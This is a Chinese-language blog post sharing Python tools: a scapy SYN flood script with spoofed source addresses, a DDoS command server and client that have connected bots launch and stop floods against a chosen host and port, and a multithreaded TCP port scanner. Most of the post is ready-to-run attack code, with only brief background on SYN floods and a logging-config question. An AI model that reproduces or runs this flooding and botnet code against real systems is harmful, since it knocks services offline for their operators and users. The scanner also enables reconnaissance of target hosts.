python实现端口扫描器/DoS/DDoS

整理github，梳理下Python小工具。以下是python实现的DoS/DDoS/端口扫描器(github)。

一、DoS

SYN Flood是当前最流行的DoS(拒绝服务攻击)与DdoS(分布式拒绝服务攻击)的方式之一，这是一种利用TCP协议缺陷，发送大量伪造的TCP连接请求，从而使得被攻击方资源耗尽(CPU满负荷或内存不足)的攻击方式。参考链接：https://baike.so.com/doc/5503756-5739500.html

利用python的scapy库可以很容易的实现DoS攻击。简单来说，scapy就是模拟客户端TCP链接的第一次握手，发送携带syn的数据包给服务端。当服务端返回syn+ack应答时，正常的客户端应该发送携带ack的响应以完成3次握手。而不正常的客户端不再响应，当有数以万记的这样的客户端时，服务器会维护一个非常大的半连接列表而消耗非常大的资源。最后导致堆栈溢出，或是服务端失去响应。

scapy库可以很容易的模拟不同的src来发起连接，所有脚本需要在root下执行。

 #!/usr/bin/env python3
 import random
 from scapy.all import *

 def synFlood(target, dPort):
     srcList = ['201.1.1.2','10.1.1.12','69.1.1.2','125.130.5.199']
     for sPort in range(1025,65535):
         index = random.randrange(4)
         ipLayer = IP(src=srcList[index],dst=target)
         tcpLayer = TCP(sport=sPort,dport=dPort,flags='S')
         packet = ipLayer/tcpLayer
         send(packet)

二、DDoS

DDoS相比DoS,不再是一个客户端发起攻击，而是由一台服务器通过socket与多台客户端建立连接，当服务器下发攻击命令时，所有客户端一起向目标机器发起攻击。

1）server部分

服务端首先需要创建socket，绑定端口和网络地址。同时开辟一个线程来建立连接，当有新的连接建立时，把连接实例存放到一个列表中。发送命令时，遍历列表，向每个socket实例发送命令。

 # -*- coding:utf-8 -*-
 #!/usr/bin/env python3

 import socket
 import argparse
 from threading import Thread
 import logging
 import logging.config
 logging.config.fileConfig("logger.conf")
 logger = logging.getLogger("serverLogger")

 socketList = []#成功建立连接的socket实例列表

 def sendCmd(cmd):
     print('Send command...')
     for sock in socketList:
         sock.send(bytes(cmd,encoding='utf-8'))

 def waitConnect(s):
     while True:
         sock,addr = s.accept() #sock是已经建立连接的socket 实例
         if sock not in socketList:
             socketList.append(sock)

 def main():
     s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
     s.bind(('0.0.0.0',58868))
     s.listen(1024)
     t = Thread(target=waitConnect,args=(s,))#开辟线程来建立连接
     t.start()

     print('Wait at least a client connection')
     while not len(socketList):
         pass

     print('It has been a client connection')

     while True:
         print('='*50)
         print('The command format:"#-H xxx.xxx.xxx.xxx -p xxxx -c <start|stop>"')
         cmd_str = input('Please input cmd:')
         if len(cmd_str):
             if cmd_str[0]=='#':
                 sendCmd(cmd_str)
             else:
                 logging.error('error format!')
                 logging.error(cmd_str)

 if __name__=='__main__':
     main()

2）client部分

client部分主要负责对服务端发送的命令进行解析(argparse模块)。如果命令格式正确，判断当前是否有攻击在执行，如果有，则停止攻击的进程，重新发起攻击；如果没有，则直接发起攻击。

 #!/usr/bin/env python3
 # -*- coding:utf-8 -*-

 import socket
 import sys
 import random
 import argparse
 from multiprocessing import Process
 from scapy.all import *
 import os
 import logging
 import logging.config
 logging.config.fileConfig("logger.conf")
 logger = logging.getLogger("clientLogger")
 isWorking = False
 curProcess = None

 #synFlood攻击
 def synFlood(target, dPort):
     print('='*100)
     print('The syn Flood is running!')
     logging.info('The syn Flood is running!')
     print('='*100)
     srcList=['201.1.1.2','10.1.1.102','69.1.1.2','125.130.5.199']
     for sPort in range(1025,65535):
         index = random.randrange(4)
         ipLayer = IP(src=srcList[index],dst=target)
         tcpLayer = TCP(sport=sPort,dport=dPort,flags='S')
         packet = ipLayer/tcpLayer
         send(packet)

 #处理命令
 def cmdHandle(sock, parser):
     global curProcess
     while True:
         data = sock.recv(1024).decode('utf-8')
         if len(data)==0:
             print('The data is empty!')
             logging.error('The data received is empty!')
             return
         if data[0]=='#':
             try:
                 options = parser.parse_args(data[1:].split())
                 m_host = options.host
                 m_port = options.port
                 m_cmd = options.cmd
                 if m_cmd.lower()=='start':
                     if curProcess !=None and curProcess.is_alive():
                         curProcess.terminate()
                         curProcess = None
                         os.system('clear')
                         logging.info('stop current process to prepare for new process.')
                     print('The synFlood is start')
                     logging.info('The synFlood is start')
                     p = Process(target=synFlood,args=(m_host,int(m_port)))
                     p.start()
                     curProcess = p
                 elif m_cmd.lower() == 'stop':
                     if curProcess !=None and curProcess.is_alive():
                         curProcess.terminate()
                         os.system('clear')
                         logging.info('stop current process.')
             except (Exception) as e:
                 print(e)
                 print('Failed to perform the command!')
                 logging.error('command format error.')

 def main():
     p = argparse.ArgumentParser()
     p.add_argument('-H', dest='host',type=str)
     p.add_argument('-p', dest='port',type=str)
     p.add_argument('-c', dest='cmd', type=str)
     print('*'*40)
     try:
         s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
         s.connect(('127.0.0.1',58868))
         print('To connected server was success!')
         print('='*40)
         cmdHandle(s,p)
     except (Exception) as e:
         print (e)
         logging.error(e)
         print('The network connected failed!')
         print('Please restart the script')
         sys.exit(0)

 if __name__=='__main__':
     main()

3）日志记录

这里使用Python的logging模块进行记录。存在一个bug，不知道有同学能帮忙看出问题在哪里么？Client模块和Server模块使用了不同的logger,预期分别记录到Client.log和Server.log中。但结果全部都会记录到Server.log中。

logger.conf设置如下：

 ###############
 [loggers]
 keys = root,serverLogger,clientLogger

 [logger_root]
 handlers = serverHandler
 level = DEBUG

 [logger_serverLogger]
 handlers = serverHandler
 qualname = serverLogger
 propagate = 0

 [logger_clientLogger]
 handlers = clientHandler
 qualname = clientLogger
 propagate = 0

 ####################
 [handlers]
 keys = serverHandler,clientHandler

 [handler_serverHandler]
 class = FileHandler
 level = DEBUG
 formatter = serverFormatter
 args = ("logs/Server.log","a")

 [handler_clientHandler]
 class = FileHandler
 level = DEBUG
 formatter = clientFormatter
 args = ("logs/Client.log","a")

 #################
 [formatters]
 keys = serverFormatter,clientFormatter

 [formatter_serverFormatter]
 format=%(asctime)s %(filename)s [line:%(lineno)d]  %(levelname)s %(message)s
 datefmt = %d %b %Y %H:%M:%S

 [formatter_clientFormatter]
 format=%(asctime)s %(filename)s [line:%(lineno)d]  %(levelname)s %(message)s
 datefmt = %d %b %Y %H:%M:%S

三、端口扫描器

端口扫描是指客户端向一定范围内的服务器端口发送对应请求，以此确认可使用的端口。常被计算机管理员用于确认安全策略，同时被攻击者用于识别目标主机上可运行的服务。

这里使用socket建立对待扫描的端口，建立完成的TCP连接。如果能够建立，说明端口是开放的。判断完毕后关闭连接。使用多线程来执行每一个TCP连接：

 #!/usr/bin/env python3

 import sys
 import _thread
 from socket import *

 def tcp_test(port):
     sock = socket(AF_INET,SOCK_STREAM)
     sock.settimeout(10)
     result = sock.connect_ex((target_ip, port))
     if result==0:
         lock.acquire()
         print("Opened Port: ", port)
         lock.release()

 if __name__ == '__main__':
     #scanPort_multi_thread.py <host> <start_port>-<end_port>
     host = sys.argv[1]
     portstrs = sys.argv[2].split('-')
     start_port = int(portstrs[0])
     end_port = int(portstrs[1])
     target_ip = gethostbyname(host)
     lock = _thread.allocate_lock()

     for port in range(start_port, end_port):
         _thread.start_new_thread(tcp_test, (port,))